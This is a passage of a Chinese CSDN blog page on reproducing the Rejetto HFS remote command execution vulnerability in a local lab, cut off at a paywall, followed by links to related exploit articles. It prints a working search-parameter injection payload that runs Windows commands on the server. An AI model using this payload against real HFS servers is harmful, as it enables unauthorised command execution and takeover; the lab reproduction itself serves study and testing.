HFS远程命令执行漏洞复现

最新推荐文章于 2024-07-04 22:03:43 发布
最新推荐文章于 2024-07-04 22:03:43 发布
阅读量5.7k 收藏 9
点赞数 1
分类专栏: 渗透测试学习 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qin9800/article/details/106403462
版权
本文详细介绍了如何复现HFS远程命令执行漏洞,包括在Windows Server 2003和Windows 10上的不同情况。通过手工利用和使用Metasploit框架,演示了添加管理员账户、开启远程端口并最终获取system权限的过程。
摘要由CSDN通过智能技术生成

漏洞程序下载地址:Http File Server

这里说一下,在Windows server 2003中复现时,我直接使用Administrator用户登录,然后复现,未出现权限问题。再Windows 10中尝试复现时发现权限不足,需要以管理员权限执行漏洞程序。

运行程序截图如下
在这里插入图片描述
尝试访问该软件提供的web服务
在这里插入图片描述
web服务是这个样子的,这个web服务的搜索处存在漏洞

一、手工利用

payload如下

http://127.0.0.1/?search==%00{
   .exec|cmd /c 此处替换为dos命令.} 
http://127.0.0.1/?search==%00{
   .exec
最低0.47元/天 解锁文章
夏了茶糜
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HFS Cmd执行漏洞入侵与防御
u010005482的专栏
09-19 5607
最近爆出了HFS(Http File Server)爆出了这个漏洞
HFS2.3漏洞利用.rar
12-28
很多用HFS当做建议下载程序 但有高危的代码审核问题。 可以添加管理员账户,密吗。 并且开启3389端口
漏洞利用-(HFS-RCE远程命令执行)
最新发布
my的博客
07-04 1202
概念验证是对某些想法的一个较短而不完整的实现,以证明其可行性,示范其原理,其目的是为了验证一些概念或理论。概念验证通常被认为是一个有里程碑意义的实现的原型。在计算机安全术语中,概念验证经常被用来作为0day、exploit的别名。
CVE-2024-23692:Rejetto HFS 2.x 远程代码执行漏洞[附POC]
薛定谔嘚喵博客
06-14 1263
Rejetto HTTP文件服务器是一个轻量级的HTTP服务器软件,它允许用户在本地计算机上快速搭建一个文件共享服务。2024年6月,互联网上披露其 2.x系列 存在CVE-2024-23692 远程代码执行漏洞,该漏洞源于存在模板注入漏洞,允许远程未经身份验证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令
HFS文件服务器RCE 漏洞复现(CVE-2024-23692)
huangyongkang666的博客
06-11 2476
Rejetto HFS是一款简单易用的Web文件服务器,可通过网络或互联网共享文件。该软件创建了一个Web界面,让用户可以直接在运行HFS软件的机器上上传或下载文件,在最新的Rejetto HTTP文件服务器(HFS)2.x版本中,发现了一个严重的安全漏洞,标记为CVE-2024-23692HFS 版本 2.4.0 RC7 和 2.3mCVE-2024-23692漏洞特别影响 HFS 版本 2.4.0 RC7 和 2.3m。根本原因在于服务器处理用于呈现 HTTP 响应的默认模板的方式。
SSRF利用HFS远程命令执行漏洞(RCE)
qq_45884775的博客
04-09 4998
0x00SSRF漏洞介绍: SSRF漏洞(服务器端请求伪造):是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)。 0x01SSRF漏洞原理: SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。利用的是服务端的请求伪造。SSRF是利用存在缺陷的we
HFS远程命令执行漏洞入侵抓鸡黑阔服务器
aiquan9342的博客
12-24 1431
先来科普一下: HFS是什么? hfs网络文件服务器 2.3是专为个人用户所设计的HTTP档案系统,如果您觉得架设FTP Server太麻烦,那么这个软件可以提供您更方便的网络文件传输系统,下载后无须安装,只要解压缩后执行 hfs.exe,于「Virtual File System(虚拟档案系统)」窗格下按鼠标右键,即可新增/移除虚拟档案资料夹,或者直接将欲加入的档案拖曳至此窗口,便...
HFS漏洞利用工具 e语言源码
03-08
HFS漏洞利用工具 e语言源码
HFS修复漏洞
09-20
HFS修复漏洞
HFS提权工具,hfs漏洞提权软件
12-10
HFS提权工具,hfs漏洞提权软件
HFS远程命令执行漏洞(RCE)
weixin_30527323的博客
03-20 3268
一、HFS漏洞 1、影响版本 : 2.3c以前的2.3x版本 2、HFSHFS是HTTP File Server,国外的一款HTTP 文件服务器软件,简单易上手。 3、漏洞描述: HTTP File Server是一款专为个人用户所设计的HTTP文件服务器,它提供虚拟档案系统,支持新增、移除虚拟档案资料夹等。 Rejetto HTTP File Server 2.3c及之前版本中的...
远程执行_HFS远程命令执行漏洞复现
weixin_42315338的博客
01-15 296
这里说一下,在Windows server 2003中复现时,我直接使用Administrator用户登录,然后复现,未出现权限问题。再Windows 10中尝试复现时发现权限不足,需要以管理员权限执行漏洞程序。漏洞程序下载地址见评论运行程序截图如下尝试访问该软件提供的web服务web服务是这个样子的,这个web服务的搜索处存在漏洞一、手工利用payload如下http://127.0.0.1/?...
渗透之——Metasploit攻击HFS 2.3上的漏洞
冰河的专栏
01-12 6328
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86358284 攻击机: kali 192.168.109.137 靶机: windows server 2012 192.168.109.141 工具:Metasploit 根据CVE-2014-6287的描述,Rejetto网络文件服务器(也被称为HSF或者HttpFi...
利用Metasploit对HFS 2.3渗透攻击提权
渗透测试
05-07 1772
文章目录前言一、Metasploit中使用数据库二、VSFTPD2.3.4渗透攻击1.威胁建模2.攻击3.渗透持久化4.清楚渗透痕迹总结 前言 针对HFS 2.3漏洞进行渗透测试提权(HFS:HttpFileServer) 一、Metasploit中使用数据库 开启步骤 root@kali:~# service postgresql start root@kali:~# msfdb init msfdb ini 初始化数据库 使用msfconsole启动metasploit 输入db_statu
Vulhub Supervisord 远程命令执行漏洞复现
weixin_53696027的博客
06-07 272
Vulhub Supervisord 远程命令执行漏洞复现
vulhub-CVE-2018-1273远程命令执行漏洞复现
m0_62008601的博客
09-23 1327
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。看到靶机中已存在shll.elf文件。接着我们就需要开启监听,这时候用nc进行监听的话,收不到反弹的shell。发送命令之后返回500说明执行成功,接着我们登录到doker容器看到success文件成功被创建,说明漏洞存在。执行之后如果没成功反弹shell ,可以先执行赋予文件权限的命令。开启监听之后,再修改请求命令,让靶机执行木马文件上线。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值